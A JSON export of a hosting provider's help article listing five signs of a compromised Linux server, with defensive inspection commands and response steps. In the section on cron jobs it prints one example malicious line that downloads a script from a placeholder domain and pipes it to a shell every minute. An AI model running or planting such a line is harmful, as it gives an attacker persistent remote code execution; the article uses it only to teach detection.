{"id":20108,"date":"2026-05-15T15:39:24","date_gmt":"2026-05-15T12:39:24","guid":{"rendered":"https:\/\/unihost.com\/help\/?p=20108"},"modified":"2026-07-01T15:32:15","modified_gmt":"2026-07-01T12:32:15","slug":"signs-that-server-was-hacked","status":"publish","type":"post","link":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","title":{"rendered":"How to Tell If a Server Has Been Hacked: 5 Main Signs of Compromise"},"content":{"rendered":"<p data-start=\"79\" data-end=\"337\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">A server compromise is not always obvious. Sometimes the website continues to work, SSH is available, the load looks normal, but the server may already have a malicious process, an unknown user, a hidden cron job, or outgoing traffic to suspicious addresses.<\/span><\/p>\r\n<p data-start=\"339\" data-end=\"571\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">In cybersecurity, such signs are called <strong data-start=\"379\" data-end=\"407\">indicators of compromise<\/strong> \u2014 traces that may indicate hacking, infection, or unauthorized access. These signs are usually checked in logs, processes, network connections, and system changes.<\/span><\/p>\r\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>1. Suspicious SSH Logins<\/b><\/span><\/h2>\r\n<p data-start=\"602\" data-end=\"806\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">The first thing to check is who logged in to the server and when. A common sign of compromise is a successful login from an unknown IP, at an unusual time, or under a user account that should not be used.<\/span><\/p>\r\n<p data-start=\"808\" data-end=\"828\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check recent logins:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">last<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check failed login attempts:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo lastb<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check SSH logs on Debian\/Ubuntu:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo grep \"Accepted\" \/var\/log\/auth.log<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo grep \"Failed password\" \/var\/log\/auth.log<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Using journalctl:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo journalctl -u ssh --since \"24 hours ago\"<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><strong>What to look for:<\/strong><\/span><\/p>\r\n<ul>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">successful login from an unknown IP;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">login as root if root login should be disabled;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">many failed login attempts;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">login at an unusual time;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">login by a user you did not create.<\/span><\/li>\r\n<\/ul>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">If you see a successful login from an unknown IP, this is already a serious reason to consider the server potentially compromised.<\/span><\/p>\r\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>2. Unknown Users, SSH Keys, or sudo Access<\/b><\/span><\/h2>\r\n<p data-start=\"1498\" data-end=\"1669\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">After gaining access, an attacker often tries to persist in the system: create a new user, add an SSH key, grant themselves sudo privileges, or modify an existing account.<\/span><\/p>\r\n<p data-start=\"1671\" data-end=\"1701\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check users with shell access:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">awk -F: '$7 ~ \/(bash|sh|zsh)$\/ {print $1, $7}' \/etc\/passwd<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check users with sudo access:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">getent group sudo<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">For AlmaLinux\/Rocky Linux\/CentOS:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">getent group wheel<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Find all authorized_keys files:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo find \/home \/root -name authorized_keys -type f -print<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check the contents of the keys:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo cat \/root\/.ssh\/authorized_keys<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo cat \/home\/USER\/.ssh\/authorized_keys<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><strong>Suspicious signs:<\/strong><\/span><\/p>\r\n<ul>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">an unknown user appeared;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a user received sudo privileges;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">an unknown SSH key was added to authorized_keys;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a new key appeared for root;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">permissions for .ssh or authorized_keys changed.<\/span><\/li>\r\n<\/ul>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><strong>Important<\/strong><\/span><br data-start=\"2365\" data-end=\"2368\" \/><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Do not delete suspicious data immediately if you plan to investigate. First, save logs and snapshots of the system state.<\/span><\/p>\r\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>3. Unknown Processes and High Load<\/b><\/span><\/h2>\r\n<p data-start=\"2530\" data-end=\"2774\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">If the server starts heavily loading the CPU, RAM, disk, or network for no clear reason, this may be a sign of malicious activity. For example, a crypto miner, spam script, proxy, botnet client, or attack script may have appeared on the server.<\/span><\/p>\r\n<p data-start=\"2776\" data-end=\"2791\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check the load:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">top (htop, atop)<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check processes:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">ps aux --sort=-%cpu | head<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">ps aux --sort=-%mem | head<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check systemd services:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">systemctl --type=service --state=running<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">systemctl --failed<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><strong>What to look for:<\/strong><\/span><\/p>\r\n<ul>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a process with an unclear name;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a process started from \/tmp, \/var\/tmp, or \/dev\/shm;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a service you did not install;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">high load without a clear reason;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a process running as www-data, nobody, or an unknown user.<\/span><\/li>\r\n<\/ul>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Examples of suspicious paths:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">\/tmp\/.x\/<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">\/var\/tmp\/.cache\/<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">\/dev\/shm\/.run\/<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Not every unfamiliar process means a hack, but an unknown process with high load and a strange launch path is a serious signal.<\/span><\/p>\r\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>4. Unusual Network Connections and Open Ports<\/b><\/span><\/h2>\r\n<p data-start=\"3531\" data-end=\"3699\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">A compromised server often starts connecting to external IPs, sending spam, participating in DDoS attacks, working as a proxy, or opening a new port for remote control.<\/span><\/p>\r\n<p data-start=\"3701\" data-end=\"3723\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check listening ports:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ss -tulpn<\/span><\/pre>\r\n<p data-start=\"3753\" data-end=\"3778\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check active connections:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ss -tunap<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">View processes that use the network:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo lsof -i -P -n<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><strong>What should raise concern:<\/strong><\/span><\/p>\r\n<ul>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">an unknown port is open;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a service is listening on 0.0.0.0, although it should not be public;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">there are persistent connections to unknown IPs;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">the server actively connects to many external addresses, especially on ports 22, 25, 3390, 5900;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">an unknown proxy, tunnel, or reverse shell appeared.<\/span><\/li>\r\n<\/ul>\r\n<p data-start=\"4218\" data-end=\"4463\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">NIST, in its incident handling guide, separately highlights data analysis and determining the correct response as an important part of incident handling. In practice, network connections, logs, and processes are among the first sources to check.<\/span><\/p>\r\n<h2><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><b>5. Suspicious cron Jobs, Autostart, and Modified Files<\/b><\/span><\/h2>\r\n<p data-start=\"4524\" data-end=\"4658\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Attackers often add a cron job or systemd unit so that a malicious script starts again after a reboot or after the process is removed.<\/span><\/p>\r\n<p data-start=\"4660\" data-end=\"4690\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check the current user\u2019s cron:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">crontab -l<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check root cron:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo crontab -l<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check system cron files:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ls -lah \/etc\/cron.d\/<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ls -lah \/etc\/cron.hourly\/<\/span><br \/><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo ls -lah \/etc\/cron.daily\/<\/span><\/pre>\r\n<p data-start=\"4889\" data-end=\"4914\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Check systemd unit files:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">systemctl list-unit-files --type=service<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">View recently modified files:<\/span><\/p>\r\n<pre><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">sudo find \/etc \/var\/www \/tmp \/var\/tmp \/dev\/shm -type f -mtime -3 2&gt;\/dev\/null<\/span><\/pre>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Suspicious signs:<\/span><\/p>\r\n<ul>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a cron job with curl or wget pointing to an unknown URL;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a script started from \/tmp, \/var\/tmp, or \/dev\/shm;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">a new systemd service with an unclear name;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">website files modified without your involvement;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">unknown PHP\/JS files in the website directory.<\/span><\/li>\r\n<\/ul>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Example of a suspicious line:<\/span><\/p>\r\n<p><span style=\"font-weight: 400; font-family: Ubuntu, sans-serif; font-size: 12pt;\">* * * * * curl -fsSL http:\/\/unknown-domain.example\/run.sh | sh<\/span><\/p>\r\n<h3><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">What to Do If There Are Signs of a Hack<\/span><\/h3>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">If one or more points match, it is better to treat the server as potentially compromised.<\/span><\/p>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><strong>Minimum actions:<\/strong><\/span><\/p>\r\n<ul>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">do not immediately delete all traces;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">save important logs;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">restrict access to the server;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">change passwords and SSH keys;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">check websites, databases, and cron;<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">make a backup of important data;<\/span><\/li>\r\n<\/ul>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">in case of a serious compromise, reinstall the server and restore only clean data.<\/span><\/p>\r\n<p data-start=\"5925\" data-end=\"6112\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><strong>Important<\/strong><\/span><br data-start=\"5934\" data-end=\"5937\" \/><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">If the server was used for payments, personal data, or client projects, it is better to conduct a full investigation and not limit yourself to deleting the suspicious process.<\/span><\/p>\r\n<h2 data-section-id=\"8dtpi\" data-start=\"6114\" data-end=\"6127\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 18pt;\">Conclusion<\/span><\/h2>\r\n<p data-start=\"6129\" data-end=\"6178\"><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">These were the 5 main signs of server compromise:<\/span><\/p>\r\n<ol>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Suspicious SSH logins<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Unknown users, keys, or sudo access<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Unknown processes and high load<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Unusual network connections and open ports<\/span><\/li>\r\n<li><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">Suspicious cron jobs, autostart, and modified files<\/span><\/li>\r\n<\/ol>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\">One sign does not always prove a hack, but several matches almost always require urgent investigation. It is better to act carefully: save logs, restrict access, check the system, and, if necessary, move the project to a clean server.<\/span><\/p>\r\n<p><span style=\"font-family: Ubuntu, sans-serif; font-size: 12pt;\"><\/span><\/p>\r\n<p class=\"wp-block-paragraph\">&nbsp;<\/p>\r\n<p><span style=\"font-family: Ubuntu, sans-serif;\"><\/span><\/p>","protected":false},"excerpt":{"rendered":"<p>A server compromise is not always obvious. Sometimes the website continues to work, SSH is available, the load looks normal, but the server may already have a malicious process, an unknown user, a hidden cron job, or outgoing traffic to suspicious addresses. In cybersecurity, such signs are called indicators of compromise \u2014 traces that may [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[158],"tags":[1094,237],"class_list":["post-20108","post","type-post","status-publish","format-standard","hentry","category-dedicated-servers","tag-compromise","tag-server"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>How to Tell If a Server Has Been Hacked<\/title>\n<meta name=\"description\" content=\"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to Tell If a Server Has Been Hacked\" \/>\n<meta property=\"og:description\" content=\"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/\" \/>\n<meta property=\"og:site_name\" content=\"Unihost.FAQ\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/unihost\/\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-15T12:39:24+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-07-01T12:32:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unihost.com\/help\/minio.php?.\/unihost-logo-alt.png\" \/>\n\t<meta property=\"og:image:width\" content=\"250\" \/>\n\t<meta property=\"og:image:height\" content=\"141\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Unihost Support\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@unihost\" \/>\n<meta name=\"twitter:site\" content=\"@unihost\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Unihost Support\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/signs-that-server-was-hacked\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/signs-that-server-was-hacked\\\/\"},\"author\":{\"name\":\"Unihost Support\",\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/#\\\/schema\\\/person\\\/bb5ae95f38577c920e6a7507888b715a\"},\"headline\":\"How to Tell If a Server Has Been Hacked: 5 Main Signs of Compromise\",\"datePublished\":\"2026-05-15T12:39:24+00:00\",\"dateModified\":\"2026-07-01T12:32:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/signs-that-server-was-hacked\\\/\"},\"wordCount\":861,\"publisher\":{\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/#organization\"},\"keywords\":[\"Compromise\",\"server\"],\"articleSection\":[\"02. Dedicated servers\"],\"inLanguage\":\"en\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/signs-that-server-was-hacked\\\/\",\"url\":\"https:\\\/\\\/unihost.com\\\/help\\\/signs-that-server-was-hacked\\\/\",\"name\":\"How to Tell If a Server Has Been Hacked\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/#website\"},\"datePublished\":\"2026-05-15T12:39:24+00:00\",\"dateModified\":\"2026-07-01T12:32:15+00:00\",\"description\":\"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/signs-that-server-was-hacked\\\/#breadcrumb\"},\"inLanguage\":\"en\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/unihost.com\\\/help\\\/signs-that-server-was-hacked\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/signs-that-server-was-hacked\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Unihost\",\"item\":\"https:\\\/\\\/unihost.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Help\",\"item\":\"https:\\\/\\\/unihost.com\\\/help\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"How to Tell If a Server Has Been Hacked: 5 Main Signs of Compromise\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/#website\",\"url\":\"https:\\\/\\\/unihost.com\\\/help\\\/\",\"name\":\"Unihost.FAQ\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/unihost.com\\\/help\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/#organization\",\"name\":\"Unihost\",\"alternateName\":\"Unihost\",\"url\":\"https:\\\/\\\/unihost.com\\\/help\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en\",\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/unihost.com\\\/help\\\/minio.php?2026\\\/01\\\/minio.png\",\"contentUrl\":\"https:\\\/\\\/unihost.com\\\/help\\\/minio.php?2026\\\/01\\\/minio.png\",\"width\":300,\"height\":300,\"caption\":\"Unihost\"},\"image\":{\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/unihost\\\/\",\"https:\\\/\\\/x.com\\\/unihost\",\"https:\\\/\\\/www.instagram.com\\\/unihost\\\/?hl=en\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/unihost-com\",\"https:\\\/\\\/www.youtube.com\\\/channel\\\/UCITKsxMDnslQY8brN3advgw\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/unihost.com\\\/help\\\/#\\\/schema\\\/person\\\/bb5ae95f38577c920e6a7507888b715a\",\"name\":\"Unihost Support\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/a0c9db17c2a0d93e8a0d5ac123f8c5db750ad4d3d5657369c0c4e480f5af77b8?s=96&d=mm&r=g\",\"caption\":\"Unihost Support\"},\"sameAs\":[\"https:\\\/\\\/unihost.com\\\/\"],\"url\":\"https:\\\/\\\/unihost.com\\\/help\\\/author\\\/support\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to Tell If a Server Has Been Hacked","description":"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","og_locale":"en_US","og_type":"article","og_title":"How to Tell If a Server Has Been Hacked","og_description":"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.","og_url":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","og_site_name":"Unihost.FAQ","article_publisher":"https:\/\/www.facebook.com\/unihost\/","article_published_time":"2026-05-15T12:39:24+00:00","article_modified_time":"2026-07-01T12:32:15+00:00","og_image":[{"width":250,"height":141,"url":"https:\/\/unihost.com\/help\/minio.php?.\/unihost-logo-alt.png","type":"image\/png"}],"author":"Unihost Support","twitter_card":"summary_large_image","twitter_creator":"@unihost","twitter_site":"@unihost","twitter_misc":{"Written by":"Unihost Support","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/#article","isPartOf":{"@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/"},"author":{"name":"Unihost Support","@id":"https:\/\/unihost.com\/help\/#\/schema\/person\/bb5ae95f38577c920e6a7507888b715a"},"headline":"How to Tell If a Server Has Been Hacked: 5 Main Signs of Compromise","datePublished":"2026-05-15T12:39:24+00:00","dateModified":"2026-07-01T12:32:15+00:00","mainEntityOfPage":{"@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/"},"wordCount":861,"publisher":{"@id":"https:\/\/unihost.com\/help\/#organization"},"keywords":["Compromise","server"],"articleSection":["02. Dedicated servers"],"inLanguage":"en"},{"@type":"WebPage","@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","url":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/","name":"How to Tell If a Server Has Been Hacked","isPartOf":{"@id":"https:\/\/unihost.com\/help\/#website"},"datePublished":"2026-05-15T12:39:24+00:00","dateModified":"2026-07-01T12:32:15+00:00","description":"Learn 5 main signs of a hacked server: suspicious SSH logins, unknown users, high load, unusual network connections, open ports, and suspicious cron jobs.","breadcrumb":{"@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/#breadcrumb"},"inLanguage":"en","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/unihost.com\/help\/signs-that-server-was-hacked\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Unihost","item":"https:\/\/unihost.com\/"},{"@type":"ListItem","position":2,"name":"Help","item":"https:\/\/unihost.com\/help\/"},{"@type":"ListItem","position":3,"name":"How to Tell If a Server Has Been Hacked: 5 Main Signs of 